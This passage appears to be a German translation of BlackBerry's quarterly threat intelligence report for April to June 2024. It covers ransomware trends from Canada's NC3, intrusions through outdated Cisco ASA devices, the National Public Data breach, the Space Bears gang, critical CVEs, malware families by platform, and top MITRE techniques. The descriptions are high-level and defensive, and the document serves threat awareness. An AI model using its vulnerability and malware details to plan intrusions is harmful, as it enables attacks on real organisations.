Große internationale Sportereignisse wie die Olympischen Spiele und die Fußballweltmeisterschaft sind ebenfalls in den Fokus von Cyberbedrohungen geraten. In Erwartung eines dramatischen Anstiegs bösartiger Cyber-Aktivitäten veröffentlichte das kanadische Zentrum für Cybersicherheit im Mai 2024 ein Bulletin zu Cyber-Bedrohungen, in dem es heißt, dass "Cyber-Kriminelle sehr wahrscheinlich große Organisationen, die mit großen internationalen Sportereignissen in Verbindung stehen, und lokale Unternehmen im Umfeld großer Sportereignisse durch Kompromittierung von Geschäfts-E-Mails und Ransomware-Angriffe ins Visier nehmen werden". Sie warnte auch Teilnehmer und Zuschauer, sich vor Phishing-E-Mails und bösartigen Websites in Acht zu nehmen, die diese Veranstaltungen als Köder für Angriffe nutzen.

Nach dem Ende der Olympischen Spiele meldeten die französischen Behörden mehr als 140 Cyberangriffe im Zusammenhang mit den Olympischen Spielen 2024, die alle als "geringe Auswirkungen" eingestuft wurden. Angesichts der Trends bei früheren Olympischen Spielen ist diese Zahl jedoch wahrscheinlich weit unterschätzt. Bei den Olympischen Spielen in Tokio 2021 meldeten die Organisatoren beispielsweise 450 Millionen Cyberangriffe.

Wie das Weltwirtschaftsforum (WEF) in seinem Global Cybersecurity Outlook 2024 feststellte, haben Regierungen und Unternehmen Schwierigkeiten, sich gegen die rasch eskalierenden und immer raffinierteren Cyberbedrohungen zu schützen, die massive Störungen verursachen könnten. Darüber hinaus gibt es große Unterschiede in der Fähigkeit von Organisationen, sich selbst zu schützen. Laut WEF verfügen 85 % der Unternehmen mit 100.000 oder mehr Mitarbeitern über eine Cyberversicherung, während weniger als 21 % der Unternehmen mit weniger als 250 Mitarbeitern eine Cyberversicherung haben. Alles in allem geben die kleinsten Unternehmen mehr als doppelt so häufig wie die größten an, dass sie nicht über die nötige Cyber-Resilienz verfügen, um ihre kritischen Mindestanforderungen zu erfüllen. Dieses Ungleichgewicht zwischen großen und kleinen Unternehmen muss behoben werden.

Rampenlicht für die Strafverfolgung

Beginnend mit diesem Global Threat Intelligence Report arbeitet BlackBerry mit dem National Cybercrime Coordination Centre (NC3) der Royal Canadian Mounted Police zusammen, um wichtige Erkenntnisse der Strafverfolgungsbehörden über Trends in der Cyberkriminalität aufzuzeigen. Dies ist nur ein Beispiel dafür, wie BlackBerry mit Strafverfolgungsbehörden auf der ganzen Welt zusammenarbeitet, um die Zusammenarbeit zwischen öffentlichem und privatem Sektor im Bereich der Cybersicherheit zu verbessern.
Rampenlicht für die Strafverfolgung
Die Cyberkriminalität gilt weltweit als eine der größten Bedrohungen und stellt die Strafverfolgungsbehörden vor besondere Herausforderungen. Im Gegensatz zu Straftaten in der realen Welt ist die Cyberkriminalität oft grenzüberschreitend, wobei Täter, Opfer und Infrastruktur häufig in verschiedene Rechtsordnungen fallen, auch international. Da es keine globale Polizei gibt, müssen die Strafverfolgungsbehörden weltweit Verfahren zur Koordinierung der Reaktionen auf Cyberkriminalität entwickeln und international zusammenarbeiten.

Verbesserung der Fähigkeiten der Strafverfolgung: Die spezialisierte Unterstützung von NC3

Das Nationale Koordinierungszentrum für Cyberkriminalität (NC3) wurde 2020 als Reaktion auf Kanadas nationale Cybersicherheitsstrategie von 2018 gegründet. Unter der Leitung der Royal Canadian Mounted Police hat dieser nationale Polizeidienst den Auftrag, die Bedrohung, die Auswirkungen und die Viktimisierung durch Cyberkriminalität in Kanada zu verringern. Das NC3 bietet allen kanadischen Polizeidienststellen spezielle Unterstützung und beschäftigt sowohl Polizei- als auch Zivilbeamte mit unterschiedlichen Qualifikationen, um die für eine effektive Analyse hochentwickelter Straftaten erforderlichen Ermittlungs- und technischen Fachkenntnisse bereitzustellen. Das NC3 bietet spezialisierte Dienstleistungen zur Unterstützung von Strafverfolgungspartnern, wie z. B.:

  • Informationen zur Cyberkriminalität
  • Technische Beratung und Anleitung
  • Entwicklung von Werkzeugen
  • Verhaltensanalyse
  • Verfolgung von Kryptowährungen

Das NC3 arbeitet eng mit nationalen und internationalen Strafverfolgungsbehörden, Regierungspartnern, der Privatwirtschaft und der Wissenschaft zusammen, um die kanadischen Strafverfolgungsbehörden bei der Bekämpfung der Internetkriminalität zu unterstützen.

Die Prävalenz von Ransomware

Da das NC3 Zugang zu Daten über Cyberkriminalität auf nationaler Ebene hat, bewertet es regelmäßig neue Trends in der Cyberkriminalität, um Ermittlungsprioritäten zu setzen und die Cyberkriminalität besser zu verstehen Ökosystem. Das NC3 verwendet Open-Source-Berichte, um das Bild zu vervollständigen. Ransomware wurde als die größte Bedrohung durch Internetkriminalität in Kanada eingestuft, da fast 60 % der dem NC3 gemeldeten Vorfälle Ransomware-Angriffe sind. Keine Organisation ist immun, da Ransomware-Betreiber alle Sektoren und Organisationen ins Visier nehmen, obwohl kleine und mittlere Unternehmen (KMU) in Kanada ein besonders attraktives Ziel darstellen.

Die wichtigsten Ransomware-Bedrohungen in Kanada

Das NC3 führt regelmäßig Bewertungen durch, um die größten Ransomware-Bedrohungen in Kanada zu ermitteln. Die jüngste Bewertung umfasste Vorfälle vom 1. Januar 2024 bis zum 30. April 2024. Die folgende Abbildung zeigt die zehn größten Ransomware-Bedrohungen für diesen Zeitraum.

Trotz der weiten Verbreitung von Ransomware werden die meisten Fälle von Internetkriminalität nicht gemeldet. Es wird geschätzt, dass nur etwa 10 % der Cyberkriminalität den kanadischen Strafverfolgungsbehörden gemeldet wird. Diese Dunkelziffer macht es schwierig, das Ausmaß und die Auswirkungen der Cyberkriminalität in diesem Land vollständig zu verstehen.

Abbildung 10: Die wichtigsten Ransomware-Funde von NC3, die Kanada betreffen, Januar bis April 2024.

Ein zu wenig beachtetes Verbrechen

Die Auseinandersetzung mit dem weit verbreiteten Problem der unzureichenden Berichterstattung über Cyberkriminalität ist von entscheidender Bedeutung, um ein umfassendes Verständnis des wahren Ausmaßes und der Auswirkungen zu erlangen. Eine genaue Berichterstattung verbessert nicht nur die Fähigkeit von Strafverfolgungsbehörden wie dem NC3, wirksam zu reagieren, sondern stärkt auch die Grundlage für strategische Gegenmaßnahmen. Durch die Förderung einer verstärkten Zusammenarbeit zwischen dem öffentlichen und dem privaten Sektor können wir die Lücke in der Berichterstattung schließen und eine widerstandsfähigere Verteidigung gegen die sich ständig weiterentwickelnde Bedrohung durch Cyberkriminalität aufbauen.
Abbildung 3: Veränderung der Rangfolge der insgesamt gestoppten Angriffe und der eindeutigen Hashes in diesem Bericht (April - Juni 2024) im Vergleich zum vorherigen Bericht (Januar - März 2024).

Cyber Story Highlight: Ransomware erreicht die Lüfte

Die Ransomware Akira zielt auf die LATAM-Fluggesellschaften ab

Im Juni 2024 untersuchten die Forscher von BlackBerry einen Angriff von Storm-1567 mit der Ransomware Akira auf eine lateinamerikanische Fluggesellschaft. Diese finanziell motivierte Bande, die für doppelte Erpressungstaktiken bekannt ist, griff zunächst über SSH auf das Netzwerk zu und exfiltrierte wichtige Daten, bevor sie Akira einsetzte. Storm-1567 ist dafür bekannt, dass er veraltete Systeme ausnutzt und legitime Software missbraucht. Er hat es weltweit auf kleine und mittlere Unternehmen abgesehen und bis Januar 2024 mehr als 42 Millionen US-Dollar an Lösegeld erbeutet.

Analyse und Kommentare zur Reaktion auf Vorfälle

Das BlackBerry Incident Response (IR)-Team beobachtet regelmäßig Vorfälle, bei denen der ursprüngliche Infektionsvektor ein mit dem Internet verbundenes Gerät ist. Cyberangriffe auf anfällige Geräte - wie falsch konfigurierte Geräte oder solche mit werkseitig eingestellten Passwörtern - sind keine Seltenheit. Überlastete Sicherheitsteams in Unternehmen schaffen es oft nicht, alle ihre Internetgeräte (z. B. Netzwerkdrucker und Laptop-Webkameras) angemessen zu schützen. Hinzu kommt, dass immer mehr kritische Funktionen in die Geräte integriert werden, z. B. in Netzwerk- und Firewall-Anwendungen.

In diesem Quartal fand das IR-Team Schwachstellen in veralteten Versionen von Cisco Adaptive Security Appliances (ASA) und Geräten mit Palo Alto Networks PAN-OS-Software. Ungeschützte oder schlecht konfigurierte Internet-Geräte können es Cyber-Dieben ermöglichen, Ransomware in die Unternehmensumgebung einzuschleusen und die Daten zu exfiltrieren. Dies unterstreicht die Notwendigkeit für Unternehmen, Sicherheitsupdates auf alle dem Internet ausgesetzten Systeme aufzuspielen und dies rechtzeitig zu tun.(MITRE - Externe Remote-Dienste)

Das Team beobachtete mehrere Vorfälle, bei denen ein unbefugter Akteur auf die Cloud-Ressourcen des Unternehmens zugreifen konnte. Die beiden unten beschriebenen jüngsten Fälle unterstreichen die Bedeutung regelmäßiger Systemaktualisierungen und robuster Netzwerksicherheitsmaßnahmen.

  • Vorfall 1: Bei einem Einbruch in die Cybersicherheit nutzten Bedrohungsakteure eine Reihe von Schwachstellen in einem veralteten Cisco ASA aus, um unbefugten Zugriff auf das virtuelle private Netzwerk (VPN) des Unternehmens zu erhalten. Nach dem Eindringen in das Netzwerk nutzten sie das Microsoft Remote Desktop Protocol (RDP), um den Domänencontroller zu infiltrieren, wodurch sie eine umfassende Liste von Benutzern und Gruppen innerhalb der Domäne erhalten konnten. Mit Hilfe von Tools wie Netscan und Advanced IP Scanner Software führten die Angreifer einen gründlichen Netzwerkscan durch, um die Infrastruktur zu erfassen. Anschließend exfiltrierten die Angreifer den gesamten Ordner "C:\Users", der wichtige Benutzerdaten enthielt, und setzten dann die Ransomware Akira ein, was zu erheblichen Störungen und Datenverlusten führte.
  • Vorfall 2: Ein Kunde erhielt alarmierende Sicherheitswarnungen von seinen Domänencontrollern, die einen unbefugten Zugriff signalisierten. Die Untersuchung ergab, dass die Angreifer Schwachstellen in einer veralteten, ausgedienten Cisco ASA-Appliance ausgenutzt hatten, um in das Netzwerk einzudringen. Sobald der Angreifer eingedrungen war, setzte er die Ransomware BlackSuit ein und verursachte eine erhebliche Unterbrechung des Betriebs des Kunden.

Diese Vorfälle machen deutlich, dass Unternehmen starke Sicherheitskontrollen für die Authentifizierung auf allen Systemen einführen müssen.(MITRE - Gültige Konten: Cloud-Konten)

Abbildung 11: Wichtigste Szenarien für die Reaktion auf Zwischenfälle, April bis Juni 2024.

Cyber Story Highlight: Massive Datenpanne offenbart 2,9 Milliarden Datensätze

Vier Terabyte sehr persönlicher Daten von Bürgern der USA, Großbritanniens und Kanadas wurden gestohlen.

Im April wurde auf der berüchtigten Untergrundseite für Cyberkriminalität BreachForums ein Verkaufsthread gepostet, in dem es um ein mutmaßliches Leck in den persönlichen Daten "der gesamten Bevölkerung der USA, Kaliforniens und Großbritanniens" ging. In dem Beitrag wurde behauptet, dass vier Terabyte Daten gestohlen wurden, die aus hochsensiblen personenbezogenen Daten wie vollständigen Namen, Postadressen, Telefonnummern und sogar Sozialversicherungsnummern (SSN) amerikanischer Bürger sowie von Menschen im Vereinigten Königreich und Kanada bestanden.

Der als USDoD bekannte Bedrohungsakteur behauptete, über 2,9 Milliarden Datensätze gestohlen zu haben, und verlangte eine beträchtliche Gebühr von 3,5 Millionen US-Dollar für die durchgesickerten Informationen in diesem großen Datensatz.

Diese Lösegeldforderung erwies sich letztendlich als erfolglos, und im Juli wurden 4 Terabyte an Daten über BreachForums kostenlos freigegeben. Dabei handelte es sich um über 137 Millionen E-Mail-Adressen, 272 Millionen Sozialversicherungsnummern und mehr. Es wird vermutet, dass die Ursache für das Datenleck bei RecordsCheck.net liegt, einer Tochtergesellschaft des Datenmaklers und Hintergrundprüfungsdienstes National Public Data (NPD), die versehentlich die Passwörter zu ihrer Backend-Datenbank in einer Klartextdatei veröffentlichte, die auf ihrer Homepage frei zugänglich war - ein kritisches Sicherheitsversäumnis, das schließlich entdeckt und von dem Bedrohungsakteur ausgenutzt wurde.

In einer förmlichen Erklärung bestätigte die NPD, dass Ende 2023 versucht wurde, auf ihre Unterlagen zuzugreifen; sie erwähnte jedoch nicht den Umfang der möglicherweise betroffenen Unterlagen.

Obwohl die Daten erst vor kurzem durchgesickert sind, erstrecken sie sich über Jahrzehnte, was bedeutet, dass ein Teil der von diesem Leck betroffenen Opfer möglicherweise bereits verstorben ist und dass einige Daten in dem Leck wahrscheinlich nicht mehr aktuell sind. Es ist auch wichtig zu wissen, dass eine Person viele verschiedene Datensätze haben kann, von denen sich jeder auf frühere Adressen und Namen bezieht, die mit dieser Person verbunden sind. Das bedeutet, dass die Zahl der von diesem Datenleck betroffenen Personen wahrscheinlich weitaus geringer ist als die irrtümliche Medienbehauptung, dass 3 Milliarden Menschen betroffen sein könnten.

Angesichts der schieren Menge an personenbezogenen Daten handelt es sich jedoch um eines der größten jemals in den USA aufgezeichneten Datenlecks, das für alle in den USA ansässigen Opfer Anlass zur Sorge sein sollte. Es ist sehr wahrscheinlich, dass diese gestohlenen Daten in den kommenden Monaten, wenn sich die Folgen dieses Debakels gelegt haben, von vielen anderen Bedrohungsakteuren genutzt und als Waffe eingesetzt werden. Es ist daher wichtig, dass alle Bürger ihre Kreditberichte aktiv auf betrügerische Aktivitäten überwachen und diese den Kreditbüros melden, wenn sie entdeckt werden.

Cyber Story Highlight: Aufstrebende Ransomware-Gruppe - Space Bears

In einer von Ransomware-Banden übersättigten Cyberbedrohungslandschaft ist es für Cyberkriminelle nach wie vor lukrativ, legitime Organisationen ins Visier zu nehmen. Häufig entstehen neue Gruppen oder spalten sich von alten Banden ab. Sie starten ihre Operationen oft mit einer neuen oder verbesserten Ransomware-Variante und einem Modus Operandi, der in der Regel auf bewährten Methoden früherer Bedrohungsakteure beruht.

Eine dieser Gruppen, die in diesem Berichtszeitraum aufgetaucht ist, sind die Space Bears, die für ihre ausgeklügelte und ausgefeilte Leak-Site bekannt sind. Einige Forscher vermuten, dass sie Verbindungen zu den Betreibern von Phobos RaaS haben könnten.

Abbildung 12: Das Leck bei den Space Bears.
Abbildung 12: Das Leck bei den Space Bears. (Quelle: https://socradar.io/dark-web-profile-spacebears/)

Wer sind die Weltraumbären?

Wie die meisten heutigen Ransomware-Gangs verwenden auch die Space Bears eine doppelte Erpressungsmethode. Nachdem sie in das Netzwerk des Opfers eingedrungen sind, verschlüsseln sie zunächst sensible Daten und setzen das Opfer dann unter Druck, ein Lösegeld zu zahlen. Space Bears können damit drohen, die Daten öffentlich im Internet zu veröffentlichen, wenn das Lösegeld nicht gezahlt wird.

Verweise auf die gestohlenen Daten werden auf ihrer Leck-Site veröffentlicht, die sich unter einer ".onion"-Adresse im Deep Web befindet. Das Tor-Projekt, gemeinhin als "The Onion Router" bezeichnet, ist ein Open-Source-Datenschutzprogramm, das die Online-Aktivitäten der Nutzer anonym und sicher hält. Das Opfer wird auf dieser Leck-Site namentlich genannt und mit einem Countdown-Timer bis zur Freigabe der Daten versehen, falls es das Lösegeld nicht innerhalb der angegebenen Frist zahlt. Seitdem die Gruppe Mitte April aktiv wurde, hat sie bereits über 20 Opfer in verschiedenen Branchen weltweit ins Visier genommen.

Abbildung 13: Space Bears Leak-Site-Opferseite.
Abbildung 13: Space Bears Leak-Site-Opferseite.

Weltraumbären: Zielindustrien und -standorte

Die Opfer der Space Bears kommen aus den unterschiedlichsten Branchen auf der ganzen Welt. Das breite Spektrum an Zielbranchen und globalen Standorten könnte beabsichtigt sein. So könnte die Gruppe beispielsweise versuchen, unter dem Radar der Strafverfolgungsbehörden zu bleiben und es den Verteidigern zu erschweren, sie zu finden. Aus diesem Grund ist in der Regel eine internationale Zusammenarbeit erforderlich, um diese Straftaten aufzuklären und die Bedrohungsgruppe auszuschalten. Da die Aktivitäten der Bedrohungsakteure weltweit so weit verbreitet sind, dauert es seine Zeit, bis Regierungen und Strafverfolgungsbehörden reagieren und Informationen austauschen. Das gibt den Ransomware-Gruppen leider mehr Möglichkeiten zur Planung, Umgehung und Umgruppierung.
Abbildung 14: Von der Bedrohungsgruppe "Space Bears" anvisierte Branchen.
Abbildung 15: Standorte der bisherigen Space Bears-Opfer.

Allgemeine Schwachstellen und Gefährdungen

Notable Common Vulnerabilities and Exposures (CVEs) bieten einen Rahmen für die Identifizierung, Standardisierung und Veröffentlichung bekannter Sicherheitsschwachstellen und Gefährdungen. Von April bis Juni 2024 wurden vom National Institute of Standards and Technology (NIST) fast 12.011 neue CVEs gemeldet. Dies entspricht einem Anstieg der gemeldeten Schwachstellen um fast 35 % gegenüber einem ähnlichen Zeitraum von Januar bis März 2024.

Der Mai hält in diesem Jahr den Rekord für die meisten neu entdeckten CVEs mit fast 5.103 neuen CVEs und bricht damit alle bekannten Zahlen aus dem ersten Quartal des Jahres. Dazu gehören:
 

Palo Alto PAN-OS RCE

CVE-2024-3400 (10.0 Kritisch) Willkürliche Code-Ausführung
Laut Palo Alto ist dieses Problem auf PAN-OS 10.2, PAN-OS 11.0 und PAN-OS 11.1 Firewalls anwendbar, die mit GlobalProtect Gateway oder GlobalProtect Portals konfiguriert sind. Die CVE bezieht sich auf die Befehlsinjektion als Folge einer Schwachstelle bei der Erstellung beliebiger Dateien in der GlobalProtect-Funktion der PAN-OS-Software von Palo Alto Networks. Diese Sicherheitslücke könnte es einem nicht authentifizierten Angreifer ermöglichen, beliebigen Code mit Root-Rechten auf der Firewall auszuführen. Angesichts dieses Potenzials wurde das CVE mit der höchsten kritischen Bewertung versehen.
 

PyTorch Framework anfällig für RCE

CVE-2024-5480 (10.0 Kritisch) Willkürliche Code-Ausführung
Eine Schwachstelle im PyTorch-Framework 'torch.distributed.rpc', insbesondere in Versionen vor 2.2.2, ermöglicht die Ausführung von entferntem Code (RCE). Diese Sicherheitslücke erlaubt es Angreifern, beliebige Befehle auszuführen, indem sie eingebaute Python-Funktionen ausnutzen.

 

Quantum Gateway Offenlegung von Informationen

CVE-2024-24919 (8.6 High) Umgehung der Authentifizierung
Perimeter-Netzwerkgeräte wie VPNs sind Hauptziele sowohl für Hacker als auch für fortschrittliche staatliche Sponsoren. Check Point™ hat am 28. Mai 2024 ein Zero-Day-Advisory veröffentlicht, in dem Kunden gewarnt werden, dass eine Schwachstelle in seinen Security Gateways es Angreifern ermöglichen kann, auf sensible Informationen zuzugreifen und Domänenrechte zu erlangen. Diese Schwachstelle ermöglicht es Hackern, sich seitlich zu bewegen und weitere Netzwerkprivilegien zu erlangen. In einer Erklärung wies Check Point darauf hin, dass es eine Reihe von unbefugten Zugriffsversuchen gegeben hat, wobei Tausende von Geräten von der Schwachstelle betroffen sein könnten.

Abbildung 16: CVE-Bewertung, April bis Juni 2024.

Vorherrschende Bedrohungen nach Plattform: Windows

Infostealer

Lumma Stealer ist ein C-basierter Infostealer, der sich auf die Exfiltration privater und sensibler Daten vom Gerät des Opfers konzentriert, einschließlich der Daten von Kryptowährungs-Geldbörsen und der Daten von Browser-Erweiterungen für die Zwei-Faktor-Authentifizierung (2FA).

Downloader

GuLoader (auch bekannt als CloudEyE) ist verschlüsselter Shellcode, der in Visual Basic 5 oder 6 verpackt ist, um zusätzliche Nutzlasten verschiedener Art herunterzuladen.

Infostealer

Agent Tesla ist ein .NET-basierter Trojaner, der häufig als MaaS verkauft wird und in erster Linie zum Sammeln von Anmeldeinformationen verwendet wird.

Infostealer

RisePro verwendet eine Reihe von Verbreitungsmethoden, um sich Zugang zu den Geräten der Opfer zu verschaffen und sensible Daten zu sammeln, die dann an einen C2-Server gesendet werden.

Infostealer

RedLine Stealer verwendet eine breite Palette von Anwendungen und Diensten, um Informationen über die Opfer zu sammeln, z. B. Passwörter, Cookies und Kreditkarteninformationen.

Fernzugriff-Trojaner

Remcos, die Abkürzung für Remote Control and Surveillance, ist eine Anwendung, mit der aus der Ferne auf das Gerät eines Opfers zugegriffen werden kann.

Fernzugriff-Trojaner

DCRat ist ein Fernzugriffstrojaner, der Informationen über das Opfer stiehlt und Befehle von einem C2-Server ausführt. Es wurde beobachtet, dass DCRat über Signal verbreitet wird.

Botnetz

Amadey ist ein Botnet, das Informationen über die Opfer sammelt und auf Befehle von einem C2-Server wartet, um zusätzliche Nutzdaten herunterzuladen.

Vorherrschende Bedrohungen nach Plattform: Linux

Trojaner

Der Trojaner XorDDos ist auch in diesem Berichtszeitraum in unserer Telemetrie weit verbreitet. XorDDos nutzt die XOR-Verschlüsselung, um den Zugriff auf Kommunikations- und Ausführungsdaten zu kontrollieren, infiziert Linux-basierte Geräte und steuert sie als einzelnes Botnetz über C2-Befehle.

Hintertür

BPFDoor ist eine Linux-Backdoor, die einen Berkeley Packet Filter (BPF) Sniffer nutzt, um den Netzwerkverkehr abzufangen und zu verändern. BPFDoor wurde von der Bedrohungsgruppe Red Menshen als passives Überwachungsinstrument eingesetzt, da es in der Lage ist, Firewalls zu umgehen und unentdeckt zu bleiben. Neue Varianten von BPFDoor haben die Reverse-Shell-Kommunikation übernommen und die Verschlüsselung gestärkt.

Botnetz

Mirai nutzt eine Schwachstelle zur Umgehung der Authentifizierung, um sich Zugang zu Endgeräten zu verschaffen, sowie eine Schwachstelle zur Befehlsinjektion, um das Botnet bereitzustellen und verwundbare Geräte zu übernehmen.

Botnetz

Bashlite, auch bekannt als Gafgyt, ist ein weiteres Linux-Botnet, das C2-Server verwendet, um Anweisungen zu senden, die von den infizierten Geräten ausgeführt werden. Es wurde dokumentiert, dass es auf IoT-Geräte (Internet der Dinge) wie Router abzielt, die es zur Koordinierung groß angelegter DDoS-Angriffe gegen Ziele nutzt.

Coinminer

XMRig ist aufgrund seiner hohen Leistung und seines Open-Source-Charakters nach wie vor ein beliebtes Tool für das Mining von Kryptowährungen wie Monero. Es wird häufig von Bedrohungsakteuren eingesetzt, sobald der erste Zugriff auf ein System erfolgt ist, und zum Mining von Kryptowährungen ohne das Wissen des Opfers verwendet.

Verbreitete Bedrohungen nach Plattform: macOS

Stealer

Cuckoo Stealer wurde im April von Kandjis Bedrohungsforschungsteam entdeckt und benannt. Er wird als bösartige Disk-Image-Datei (DMG) verbreitet, die Spyware und Infostealer-Funktionen enthält. Seit der Entdeckung von Cuckoo Stealer ist die Zahl der neuen Malware-Samples, die in der freien Wildbahn auftauchen, stark angestiegen.

Stealer

Atomic Stealer (auch bekannt als AMOS) ist nach wie vor weit verbreitet, da viele neue Varianten in freier Wildbahn gesichtet wurden. Die neuen Varianten tarnen sich als verschiedene Anwendungen, die über Disk-Images verteilt werden. AMOS ist ein Stealer, der es auf Passwörter, Browser-Cookies, Autofill-Daten, Krypto-Wallets und Mac-Schlüsselbunddaten abgesehen hat.

Hintertür

Ein bösartiger Angriff, der den Python Package Index (PyPI) nutzt, wurde von Forschern entdeckt. Die Malware nutzt die PyPI-Bibliothek, um eine Sliver-C2-Nutzlast auf dem Zielcomputer zu installieren. Das Paket ist in der Programmiersprache Go geschrieben und nutzt Steganografie in einer PNG-Datei (Portable Networks Graphic), um den Angriff auszuführen.

Stealer

Diese Malware verbreitet sich über bösartige Google-Anzeigen für den Arc-Webbrowser. Diese Anzeigen verleiten das Opfer dazu, eine bösartige DMG-Installationsdatei herunterzuladen, die den Infektionsprozess einleitet und die Malware auf dem Rechner ablegt. Poseidon ist in der Lage, Benutzeranmeldeinformationen, VPN-Konfigurationen und Kryptowährungs-Wallets zu sammeln.

Vorherrschende Bedrohungen nach Plattform: Android

Infostealer

Dieser Infostealer nutzt den Android Accessibility Service, um Benutzerdaten zu erfassen und die erfassten Daten an seinen C2-Server zu senden. SpyNote bietet die Möglichkeit, zu klicken/lang zu klicken, Screenshots zu erstellen und den Bildschirm des Opfers zu sperren.

Backdoor/Ransomware

Rafel RAT wird als trojanische Anwendung oder über Phishing-Kampagnen verbreitet. Zu seinen Fähigkeiten gehören C2, Standortverfolgung, Umleitung von Gerätebenachrichtigungen und Extraktion von persönlichen SMS-Nachrichten und Anrufprotokollen vom Zielgerät.

Infostealer

SoumniBot stiehlt Bankschlüssel und plündert die Bankkonten der Opfer. Die Malware nutzt ein Validierungsproblem im Android-Manifest aus und stiehlt Informationen, die sie auf einen Remote-Server hochlädt.

Infostealer

Vultur wurde über trojanische Anwendungen und Social-Engineering-Techniken wie "Smishing" (SMS-Phishing) verbreitet. Neben der Datenexfiltration kann ein Bedrohungsakteur mit Vultur Änderungen am Dateisystem vornehmen, Ausführungsberechtigungen ändern und das infizierte Gerät über Android Accessibility Services steuern.

Gemeinsame MITRE-Techniken

Das Verständnis der hochrangigen Techniken von Bedrohungsgruppen kann bei der Entscheidung helfen, welche Erkennungstechniken priorisiert werden sollten. BlackBerry beobachtete die folgenden 20 wichtigsten Techniken, die von Bedrohungsakteuren in diesem Berichtszeitraum eingesetzt wurden.
 

Erkannte Techniken

Die folgende Tabelle zeigt die 20 wichtigsten Techniken. Ein Aufwärtspfeil (↑) in der Spalte "Veränderung" bedeutet, dass die Nutzung der Technikseit unserem letzten Bericht zugenommen hat. Ein Abwärtspfeil (↓) zeigt an, dass dieNutzung seit unserem letzten Berichtzurückgegangenist . Ein Gleichheitszeichen (=) bedeutet, dass die Technik an der gleichen Stelle wie in unserem letzten Bericht bleibt.

Technik Name Technik-ID Taktik Name Letzter Bericht Ändern Sie
Hijack-Ausführungsablauf
T1574
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
NA
DLL-Seiten-Laden
T1574.002
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
3
Prozess Injektion
T1055
Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
1
Eingabe-Erfassung
T1056
Zugangsberechtigung, Sammlung
4
=
Suche nach Systeminformationen
T1082
Entdeckung
2
Software-Entdeckung
T1518
Entdeckung
NA
Entdeckung von Sicherheitssoftware
T1518.001
Entdeckung
5
Prozess Entdeckung
T1057
Entdeckung
8
Suche nach Dateien und Verzeichnissen
T1083
Entdeckung
7
Maskerade
T1036
Verteidigung Umgehung
6
Protokoll der Anwendungsschicht
T1071
Befehl und Kontrolle
9
Nicht-Anwendungsschicht-Protokoll
T1095
Befehl und Kontrolle
11
Fernerkundung von Systemen
T1018
Entdeckung
12
Autostart-Ausführung beim Booten oder Anmelden
T1547
Persistenz, Privilegieneskalation
NA
Registry Run Keys / Startup Folder
T1547.001
Persistenz, Privilegieneskalation
10
Anwendungsfenster Entdeckung
T1010
Entdeckung
13
Verteidigungen beeinträchtigen
T1562
Verteidigung Umgehung
NA
Deaktivieren oder Ändern von Tools
T1562.001
Verteidigung Umgehung
17
Geplanter Task/Job
T1053
Ausführung, Persistenz, Privilegieneskalation
15
Daten aus dem lokalen System
T1005
Sammlung
NA
Technik-ID
Hijack-Ausführungsablauf
T1574
DLL-Seiten-Laden
T1574.002
Prozess Injektion
T1055
Eingabe-Erfassung
T1056
Suche nach Systeminformationen
T1082
Software-Entdeckung
T1518
Entdeckung von Sicherheitssoftware
T1518.001
Prozess Entdeckung
T1057
Suche nach Dateien und Verzeichnissen
T1083
Maskerade
T1036
Protokoll der Anwendungsschicht
T1071
Nicht-Anwendungsschicht-Protokoll
T1095
Fernerkundung von Systemen
T1018
Autostart-Ausführung beim Booten oder Anmelden
T1547
Registry Run Keys / Startup Folder
T1547.001
Anwendungsfenster Entdeckung
T1010
Verteidigungen beeinträchtigen
T1562
Deaktivieren oder Ändern von Tools
T1562.001
Geplanter Task/Job
T1053
Daten aus dem lokalen System
T1005
Taktik Name
Hijack-Ausführungsablauf
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
DLL-Seiten-Laden
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
Prozess Injektion
Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
Eingabe-Erfassung
Zugangsberechtigung, Sammlung
Suche nach Systeminformationen
Entdeckung
Software-Entdeckung
Entdeckung
Entdeckung von Sicherheitssoftware
Entdeckung
Prozess Entdeckung
Entdeckung
Suche nach Dateien und Verzeichnissen
Entdeckung
Maskerade
Verteidigung Umgehung
Protokoll der Anwendungsschicht
Befehl und Kontrolle
Nicht-Anwendungsschicht-Protokoll
Befehl und Kontrolle
Fernerkundung von Systemen
Entdeckung
Autostart-Ausführung beim Booten oder Anmelden
Persistenz, Privilegieneskalation
Registry Run Keys / Startup Folder
Persistenz, Privilegieneskalation
Anwendungsfenster Entdeckung
Entdeckung
Verteidigungen beeinträchtigen
Verteidigung Umgehung
Deaktivieren oder Ändern von Tools
Verteidigung Umgehung
Geplanter Task/Job
Ausführung, Persistenz, Privilegieneskalation
Daten aus dem lokalen System
Sammlung
Letzter Bericht
Hijack-Ausführungsablauf
NA
DLL-Seiten-Laden
3
Prozess Injektion
1
Eingabe-Erfassung
4
Suche nach Systeminformationen
2
Software-Entdeckung
NA
Entdeckung von Sicherheitssoftware
5
Prozess Entdeckung
8
Suche nach Dateien und Verzeichnissen
7
Maskerade
6
Protokoll der Anwendungsschicht
9
Nicht-Anwendungsschicht-Protokoll
11
Fernerkundung von Systemen
12
Autostart-Ausführung beim Booten oder Anmelden
NA
Registry Run Keys / Startup Folder
10
Anwendungsfenster Entdeckung
13
Verteidigungen beeinträchtigen
NA
Deaktivieren oder Ändern von Tools
17
Geplanter Task/Job
15
Daten aus dem lokalen System
NA
Ändern Sie
Hijack-Ausführungsablauf
DLL-Seiten-Laden
Prozess Injektion
Eingabe-Erfassung
=
Suche nach Systeminformationen
Software-Entdeckung
Entdeckung von Sicherheitssoftware
Prozess Entdeckung
Suche nach Dateien und Verzeichnissen
Maskerade
Protokoll der Anwendungsschicht
Nicht-Anwendungsschicht-Protokoll
Fernerkundung von Systemen
Autostart-Ausführung beim Booten oder Anmelden
Registry Run Keys / Startup Folder
Anwendungsfenster Entdeckung
Verteidigungen beeinträchtigen
Deaktivieren oder Ändern von Tools
Geplanter Task/Job
Daten aus dem lokalen System

